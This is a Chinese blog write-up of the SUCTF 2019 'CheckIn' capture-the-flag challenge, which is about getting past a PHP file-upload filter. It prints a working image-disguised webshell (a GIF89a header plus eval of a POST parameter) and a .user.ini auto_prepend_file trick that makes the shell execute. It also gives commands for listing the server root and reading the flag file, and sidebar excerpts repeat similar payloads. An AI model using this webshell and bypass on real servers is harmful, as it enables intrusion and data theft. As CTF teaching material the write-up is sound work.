web-[SUCTF 2019]CheckIn

最新推荐文章于 2022-03-23 19:12:08 发布
最新推荐文章于 2022-03-23 19:12:08 发布
阅读量244 收藏
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wojiushilsy/article/details/105615814
版权

题目要点

  • .user.ini文件

题目内容

在这里插入图片描述

解题

打开页面,一看就是文件上传相关漏洞
先随便上传一个txt文本文件,返回 exif_imagetype:not image!
这里我们可以得到信息:1.上传image。2.使用了 exif_imagetype 判断上传类型。
接着我们上传木马,同时添加文件头 GIF89a ,修改后缀为jpg
提示 <? in contents!
再改,最终结果

a.jpg源码

GIF89a
<script language='php'>eval($_POST['pass']);</script>

上传成功后还要解析为php才能使用。
这里使用 .user.ini 参考文章1参考文章2

上传.user.ini

.user.ini源码

GIF89a
auto_prepend_file=a.jpg

最后菜刀连一下,找到flag。

方法二

上传图片马后
扫描根目录:a=var_dump(scandir("/"));,我们可以可以看见一个叫flag的文件
打印:a=var_dump(file_get_contents("/flag"));

超级神兽小金刚
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SUCTF 2019] web题-CheckIn
BROTHERYY的博客
07-07 517
复现环境:buuoj.cn 尝试了各种上传绕过的方法,但依然还是不行,看了下其他大佬的wp,茅塞顿开,也说明我太菜了。 写入保存将ctf.txt改为ctf.jpg auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件 auto_append_file 表示在php代码执行完毕后加载指定的php文件 自定义的.user,ini先执行auto_prepend_file函数,auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件,也就是先加
[RoarCTF 2019]Easy Calc
weixin_52116519的博客
04-16 4885
原理1:利用PHP的字符串解析特性 参考文章:利用PHP的字符串解析特性Bypass PHP将查询字符串(在URL或正文中)转换为内部$_GET或关联数组$_POST。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。 例如: /?foo=bar变成Array([foo]=> “bar”)。 /? foo=bar变成Array([foo]=> “bar”)。 //?号后有一个空格 /?+foo=bar变成Array([foo]=> “bar”)。 //?号后有一个+
php无参执行RCE
遇事不决冲冲冲
03-23 3137
php无参执行RCE一般来说当我们可以控制或自己上传一个木马后,就可以进行任意命令执行,但像上面这样`/[^\W]+\((?R)?\)/`的正则过滤方式,我们不能输入任何参数,这样想绕过的话一个大的思路就是通过套娃,通过让一个函数的返回值作为另一个函数的参数,也就是这样`a(b(c()));`,最终达到rce的效果,下面列几种绕过方法
CTF有效的目录扫描工具
12-13
CTF有效的目录扫描工具
[SUCTF 2019]CheckIn
沐目的博客
10-22 1万+
一、知识点 1.1exif_imagetype() 打开发现是上传,发现可以上传jpg等格式的文件。然后上传txt格式的文件,发现后台好像是通过exif_imagetype函数判断的— 判断一个图像的类型。 <?php if (exif_imagetype("image.gif") != IMAGETYPE_GIF) { echo "The picture is not a gif"...
hence-flight-checkin
05-06
您必须先安装凉亭: npm install -g bower 然后,继续并方便地安装元素的依赖项: npm run install-deps可用的Gulp命令$ gulp将编译资产,通过实时重载为您的Web组件提供服务,转换es6,并在观察src文件的同时将js ...
genshin-daily-checkin
04-23
怎么跑 在Docker Swarm上运行 例子: docker service create --name genshin-daily-login truong996/genshin-daily-login 仅运行Docker docker run -d truong996/genshin-daily-login
sau-class-checkin
04-02
关于 这是一个脚本,如果设置正确,它将告诉SAU您的位置 因为大多数课程都是在一个小时开始的,并且一个好学生应该在该时间之前到达并办理登机手续,所以脚本会设法解决这个问题。 如果您在一个小时的更改前5分钟...
liang-chen-yun-checkin
03-31
报到1:前叉仓库2:在仓库的秘密中记录账号密码设置->秘密2.1: 添加 EMAIL2.2: 添加 PASSWORD
42-qr-checkin:二维码签到
04-01
首尔42少年 $ git clone https://github.com/innovationacademy-kr/42-qr-checkin $ cd 42-qr-checkin $ npm install ... 打开Web浏览器并导航到以查看实际示例。 42 API清单 이문서의 Internet上发布。
SUCTF_Checkin
When you collect everything, you understand nothing.
10-25 630
测试后一共有三种回显结果: <? in contents!表示 <?不能连续出现在文件中 illegal suffix!表示 不能上传后缀为php、php4、php5、phtml等可直接被解析的PHP文件 exif_imagetype:not image表示判断一个图片的类型(即读取一个图像的第一个字节并检查其签名) 解题思路 先上传一个.user.ini文件,.user.ini...
BUUCTF [SUCTF 2019]CheckIn
qq_42158602的博客
02-07 1591
拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功 发现添加图片头文件就可以绕过 GIF89a 上传php文件的时候发现过滤了<? 绕过检测 <script language='php'></script> 构造图片马 GIF89a <script language='php'>eval($_GET['...
php scandir遍历,php scandir遍历显示所有文件与文件夹下的文件
weixin_32101377的博客
03-13 153
遍历目录下所有文件了。目录遍历 function numfilesindir ($thedir){if (is_dir ($thedir)){$scanarray = scandir ($thedir);for ($i = 0; $i < count ($scanarray); $i ){if ($scanarray[$i] != "." && $scanarray[$i...
php中var_dump()函数的详解说明
10-24 1178
var_dump()方法是判断一个变量的类型与长度,并输出变量的数值,如果变量有值输的是变量的值并回返数据类型.此函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。 例如...
php上传文件
热门推荐
漂渺影子的专栏
09-07 6万+
POST 方法上传本特性可以使用户上传文本和二进制文件。用 PHP 的认证和文件操作函数,可以完全控制允许哪些人上传以及文件上传后怎样处理。 PHP 能够接受任何来自符合 RFC-1867 标准的浏览器(包括 Netscape Navigator 3 及更高版本,打了补丁的 Microsoft Internet Explorer 3 或者更高版本)上传的文件。 相关的设置: 请
一道文件上传题checkln
Mars748的博客
10-08 599
这是一道文件上传题,做起来感到毫无头绪,看来提示 .user.ini 才知道怎么回事 .user.ini究竟是个什么东东 自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用 .htaccess 文件有同样效果。 ...
Akira Homework WP
qq_41252520的博客
09-11 542
分析 无壳,直接用IDA打开。运行程序时提示的字符串在IDA中未能找到,一定是运行才会解密。于是IDA动态调试,下断在 start 结果立马就被结束进程了,猜测可能在 TLS 回调中有调试器检测。果不其然: 将反调试patch掉,重新动态调试。单步发现程序起用了一个线程,线程函数中的 sub_140008B20 正常情况下引起程序结束,需要patch掉。还有 sub_140008500 里边...
[原题复现+审计][SUCTF 2019] WEB CheckIn(上传绕过、.user.ini)
笑花大王
02-29 1020
简介 原题复现:https://github.com/team-su/SUCTF-2019/tree/master/Web/checkIn 考察知识点:上传绕过、.user.ini 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 拿到题老方法 各种绕过尝试 经过测试 得知有:后缀名检测(ph...
一天一道CTF 第十天 (PHP字符串解析特性绕过)
scrawman的博客
03-15 364
前面几天因为做战队大佬出的题耽误了,今天开始继续 [RoarCTF 2019]Easy Calc 直接查看源码发现有一个calc.php文件,URL后面加/calc.php直接就进去了 那么在这里我们就可以传递num参数,这里有两个难点:一个是WAF只允许num传入数字,另一个是preg_match过滤了很多字符。 前一个我们可以在num前面加空格绕过,应用的是PHP的字符串解析特性,waf会将" num"和"num"识别为两个不同的变量,但是PHP在解析字符串的时候会将空格自动去掉。 所以最后的pay
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值